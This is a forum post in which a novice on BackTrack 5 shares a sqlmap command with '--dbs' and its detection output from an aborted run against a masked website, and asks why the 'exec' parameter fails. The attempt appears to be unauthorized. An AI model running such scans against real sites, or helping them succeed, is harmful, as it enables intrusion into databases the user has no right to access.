About SQL INJECTION
#1
Question 
I am using BACKTRACK 5


root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://www.xxxxxx.com/index.php?exec=./about/hehehe --dbs

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:00:42

[17:00:43] [INFO] using '/pentest/web/scanners/sqlmap/output/xxxxxx.com/session' as session file
[17:00:43] [INFO] testing connection to the target url
[17:00:48] [INFO] testing if the url is stable, wait a few seconds
[17:00:54] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(c)ontinue/(s)tring/(r)egex/(q)uit] c
[17:01:05] [INFO] testing if GET parameter 'exec' is dynamic
[17:01:07] [INFO] confirming that GET parameter 'exec' is dynamic
[17:01:08] [INFO] GET parameter 'exec' is dynamic
[17:01:10] [WARNING] heuristic test shows that GET parameter 'exec' might not be injectable
[17:01:10] [INFO] testing sql injection on GET parameter 'exec'
[17:01:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:01:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:01:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:01:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
^C[17:01:41] [WARNING] user aborted during detection phase
How do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] q
[17:01:44] [ERROR] user quit

[*] shutting down at: 17:01:44


I was just trying out SQL injection and it ended up going down. Without realizing it I've spent 3 hours focused on learning SQL, but I haven't found any results yet...

(I've disguised the target site as xxxxxx, bro, otherwise it would be dangerous; people would think I want to mess it up, when really I just want to test.)

So here's the thing, bro: I think the problem above lies in the "exec" part, right? (I'm just acting like I know.)
Because in the tutorial I followed there was no "exec", only "id", for example like this, bro: "http:www.fbi.com/hacker.php?id=12"

Please help me with this problem, bro...
Thank you so very much for your help....
Greetings, backtracker...





